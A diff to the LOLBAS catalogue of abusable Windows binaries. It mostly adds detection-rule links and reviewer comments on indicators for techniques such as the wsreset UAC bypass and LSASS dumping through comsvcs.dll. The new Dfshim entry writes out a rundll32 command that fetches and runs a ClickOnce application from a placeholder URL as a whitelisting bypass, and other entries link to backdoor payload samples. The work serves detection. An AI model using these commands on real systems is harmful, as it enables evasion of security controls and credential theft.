- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
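Review bot: the new IOC "DotNet CLR Usage Log - wscript.exe.log" names only a file; state the directory the CLR writes its usage logs to (the per-user UsageLogs folder) so a responder can actually hunt for it, and the same applies to the matching wmic.exe.log IOC in the Wmic hunk. The three Sigma links line up with the three IOCs (sysmon_susp_clr_logs.yml is the file_event rule for the usage log, sysmon_susp_script_dotnet_clr_dll_load.yml for the CLR image loads, win_susp_script_execution.yml for the process creation), and defense_evasion_unusual_dir_ads.toml matches the alternate-data-stream IOC; only command_and_control_remote_file_copy_scripts.toml has no IOC line explaining why it is here.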
@ -16,6 +16,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_wsreset_uac_bypass.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/af599e487728ec95eab96d8a980718aa6a0699e4/rules/windows/process_creation/win_uac_bypass_wsreset.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_wsreset.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/registry_event/sysmon_bypass_via_wsreset.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml
|
||||||
- IOC: wsreset.exe launching child process other than mmc.exe
|
- IOC: wsreset.exe launching child process other than mmc.exe
|
||||||
- IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
|
- IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
|
||||||
- IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen
|
- IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen
|
||||||
|
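Review bot: three of the four Sigma links are process_creation rules for the same technique (win_wsreset_uac_bypass.yml and win_uac_wsreset.yml at commit 08ca62cc..., win_uac_bypass_wsreset.yml at af599e48...); the two at the same commit are distinct files there, but the third may be a later rename of one of them, so check the rule ids and link each distinct detection logic once. sysmon_bypass_via_wsreset.yml (registry_event) should stay as a separate link since it pairs with the registry-value IOC below it.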
@ -16,7 +16,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_wuauclt_network_connection.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/f16aca7a353bb01d9862ea1f2a10fa0d866e83c3/rules/windows/process_creation/sysmon_proxy_execution_wuauclt.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml
|
||||||
- IOC: wuauclt run with a parameter of a DLL path
|
- IOC: wuauclt run with a parameter of a DLL path
|
||||||
|
- IOC: Suspicious wuauclt Internet/network connections
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://dtm.uk/wuauclt/
|
- Link: https://dtm.uk/wuauclt/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
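Review bot: the new IOC "Suspicious wuauclt Internet/network connections" is too loose on its own, since wuauclt contacts update servers in normal operation; tie it to the preceding IOC ("wuauclt run with a parameter of a DLL path"), e.g. "network connections from a wuauclt.exe instance started with a DLL path argument", and check that sysmon_wuauclt_network_connection.yml applies that scoping. sysmon_proxy_execution_wuauclt.yml and win_susp_wuauclt.yml are pinned at different commits and may be one rule renamed; verify before listing both.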
@ -31,7 +31,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_class_exec_xwizard.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/8909eefb90c799fb642f6d9d0d6ee6d855a6a654/rules/windows/process_creation/win_dll_sideload_xwizard.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
|
- Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
|
||||||
- Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
|
- Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
|
||||||
|
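Review bot: replacing the empty `- IOC:` placeholder is right, but the entry is left with no human-readable IOC at all; add one per linked rule family, e.g. "xwizard.exe launched with a COM class id argument" for win_class_exec_xwizard.yml / execution_com_object_xwizard.toml and "xwizard.exe loading a DLL from outside its install directory" for win_dll_sideload_xwizard.yml, so the generic defense_evasion_unusual_process_network_connection.toml link has some context.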
@ -46,7 +46,8 @@ Code_Sample:
|
|||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
- Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
||||||
- Link: https://twitter.com/ItsReallyNick/status/967859147977850880
|
- Link: https://twitter.com/ItsReallyNick/status/967859147977850880
|
||||||
|
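Review bot: after dropping the empty `- IOC:`, Advpack carries no IOC text, only the generic win_susp_rundll32_activity.yml rule and the advpack-specific Splunk rule; add a one-line observable matching the Code_Sample (rundll32.exe loading advpack.dll with an .inf argument that fetches a .sct payload) so the Advpack.inf / Advpack_calc.sct samples are tied to something detectable. win_susp_rundll32_activity.yml is reused across the library entries in this commit; confirm its selection actually covers advpack before relying on it here.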
29
yml/OSLibraries/Dfshim.yml
Normal file
@ -0,0 +1,29 @@
|
|||||||
|
---
|
||||||
|
Name: Dfshim.dll
|
||||||
|
Description: ClickOnce engine in Windows used by .NET
|
||||||
|
Author: 'Oddvar Moe'
|
||||||
|
Created: 2018-05-25
|
||||||
|
Commands:
|
||||||
|
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||||
|
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||||
|
Usecase: Use binary to bypass Application whitelisting
|
||||||
|
Category: AWL bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1127
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
Resources:
|
||||||
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
|
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Casey Smith
|
||||||
|
Handle: '@subtee'
|
||||||
|
---
|
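Review bot: Full_Path lists four Dfsvc.exe locations, but the new file is Name: Dfshim.dll under OSLibraries, so Full_Path should carry the library's own location; the Dfsvc.exe paths belong with the "trampoline for Dfsvc.exe" remark in the Description or under Resources. Detection has only the generic win_susp_rundll32_activity.yml link; add IOCs that match the Command, e.g. "rundll32.exe invoking dfshim.dll,ShOpenVerbApplication with a URL argument" and "Dfsvc.exe spawned by rundll32.exe". Minor: "click-once-application" in the Description should read "ClickOnce application".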
@ -44,7 +44,8 @@ Code_Sample:
|
|||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||||
- Link: https://twitter.com/pabraeken/status/991695411902599168
|
- Link: https://twitter.com/pabraeken/status/991695411902599168
|
||||||
|
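Review bot: the Splunk link added for Ieadvpack is detect_rundll32_application_control_bypass___advpack.yml, the same file linked from the Advpack hunk; confirm that rule's search also matches ieadvpack.dll, otherwise the link is mis-attributed here and the entry needs its own IOC line (rundll32.exe loading ieadvpack.dll with the Ieadvpack.inf / Ieadvpack_calc.sct pattern from Code_Sample) instead.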
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||||
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||||
|
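Review bot: the empty `- IOC:` is replaced by win_susp_rundll32_activity.yml alone, and that single generic link becomes the whole Detection section for several later library hunks in this commit as well; it is a broad process_creation rule for rundll32, not a detection for this specific export, so each of these entries should keep at least one IOC naming the library and the argument pattern that distinguishes the abuse (here, rundll32.exe passed a .url file as in the calc.url Code_Sample).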
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/998567549670477824
|
- Link: https://twitter.com/pabraeken/status/998567549670477824
|
||||||
- Link: https://windows10dll.nirsoft.net/mshtml_dll.html
|
- Link: https://windows10dll.nirsoft.net/mshtml_dll.html
|
||||||
|
@ -17,7 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/harr0ey/status/989617817849876488
|
- Link: https://twitter.com/harr0ey/status/989617817849876488
|
||||||
- Link: https://windows10dll.nirsoft.net/pcwutl_dll.html
|
- Link: https://windows10dll.nirsoft.net/pcwutl_dll.html
|
||||||
|
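Review bot: the Analysis link points at Red Canary's general rundll32 technique page rather than anything pcwutl-specific, which is fine as background but does not replace the dropped `- IOC:`; add an observable such as "rundll32.exe loading pcwutl.dll with an executable path argument" so the entry states what to look for.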
@ -27,7 +27,9 @@ Code_Sample:
|
|||||||
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
||||||
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
|
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_setupapi_installhinfsection.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/huntresslabs/evading-autoruns
|
- Link: https://github.com/huntresslabs/evading-autoruns
|
||||||
- Link: https://twitter.com/pabraeken/status/994742106852941825
|
- Link: https://twitter.com/pabraeken/status/994742106852941825
|
||||||
|
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||||
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||||
|
@ -29,7 +29,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/Hexacorn/status/885258886428725250
|
- Link: https://twitter.com/Hexacorn/status/885258886428725250
|
||||||
- Link: https://twitter.com/pabraeken/status/991768766898941953
|
- Link: https://twitter.com/pabraeken/status/991768766898941953
|
||||||
|
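Review bot: rundll32_control_rundll_hunt.yml is, by its name, a hunting search rather than an alerting detection, so expect it to be noisy; the entry should say what distinguishes the abuse case (the Control_RunDLL export being passed an arbitrary file) in an IOC line rather than leaving the hunt query and the generic win_susp_rundll32_activity.yml rule as the only detection guidance.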
@ -26,7 +26,8 @@ Code_Sample:
|
|||||||
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
||||||
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/994392481927258113
|
- Link: https://twitter.com/pabraeken/status/994392481927258113
|
||||||
- Link: https://twitter.com/harr0ey/status/975350238184697857
|
- Link: https://twitter.com/harr0ey/status/975350238184697857
|
||||||
|
@ -52,7 +52,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||||
- Link: https://twitter.com/DissectMalware/status/995348436353470465
|
- Link: https://twitter.com/DissectMalware/status/995348436353470465
|
||||||
|
@ -24,7 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/moriarty_meng/status/977848311603380224
|
- Link: https://twitter.com/moriarty_meng/status/977848311603380224
|
||||||
- Link: https://twitter.com/bohops/status/997896811904929792
|
- Link: https://twitter.com/bohops/status/997896811904929792
|
||||||
|
@ -16,7 +16,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
- Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: MiniDump being used in library
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_process_dump_rundll32_comsvcs.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_dump_comsvcs_dll.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_comsvcs_procdump.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
- Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
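Review bot: the existing IOC "MiniDump being used in library" is removed rather than kept alongside the new rule links, which loses the one human-readable observable in the entry; restore it in sharper form, e.g. "rundll32.exe loading comsvcs.dll with MiniDump in the command line" for the process_creation rules (win_process_dump_rundll32_comsvcs.yml, win_susp_comsvcs_procdump.yml, dump_lsass_via_comsvcs_dll.yml, credential_access_cmdline_dump_tool.toml) and "rundll32.exe opening a handle to lsass.exe" for the process_access rule (sysmon_lsass_dump_comsvcs_dll.yml).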